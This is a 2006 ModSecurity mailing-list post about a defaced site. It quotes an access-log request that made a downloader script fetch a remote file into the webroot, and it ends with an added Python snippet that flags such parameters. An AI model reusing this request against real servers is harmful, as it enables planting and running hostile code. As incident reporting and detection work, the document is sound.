[Modsecurity] New downloadable exploit
Michael S.
admin at thenamegame.com
Thu Apr 20 00:00:52 EDT 2006
One of our user sites was hacked on April 4th. It seems they used this
command to do it.
195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"
Notice the 200 status? Is there a rule to stop this?
This is a shell script that was downloaded to the user's website then
executed to deface the site. They were unable to do anything.
Thank you.
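
One way to find requests shaped like the one quoted above in an access log, as an added example that is not part of the original message: it decodes each query parameter and flags values that are a remote URL or an absolute server path, along with whether the request was served. The regular expressions, the function name and the benign log line are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The request from the post, rejoined onto one line (the mailer had wrapped it).
SAMPLE = (
    '195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET '
    '/rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&'
    'comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpubli'
    'c_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 '
    '"http://www.site.com.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; '
    'Windows NT 5.1; SV1)" "hotlog=1"'
)
# Constructed benign line in the same log format, for contrast.
BENIGN = ('192.0.2.10 www.site.com - [04/Apr/2006:12:17:01 -0400] '
          '"GET /gallery.php?page=2&sort=date HTTP/1.1" 200 5120 "-" "Mozilla/4.0" "-"')

# Layout seen in the post: client IP, vhost, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
# Assumed heuristics: a parameter that is itself a URL, or an absolute server path.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)
ABS_PATH = re.compile(r'^/(?:home|var|usr|etc|tmp|srv)/')

def suspicious_params(line):
    """Return None for an unparseable line, else a dict describing the request."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    # parse_qsl percent-decodes, so %3A%2F%2F is compared as "://".
    for name, value in parse_qsl(urlsplit(m['uri']).query, keep_blank_values=True):
        if REMOTE_URL.search(value):
            findings.append((name, 'remote-url', value))
        elif ABS_PATH.search(value):
            findings.append((name, 'server-path', value))
    status = int(m['status'])
    return {'ip': m['ip'], 'vhost': m['vhost'], 'status': status,
            'served': status < 400, 'findings': findings}

if __name__ == '__main__':
    for entry in (SAMPLE, BENIGN):
        result = suspicious_params(entry)
        if result['findings']:
            print(result['ip'], result['status'], result['findings'])
```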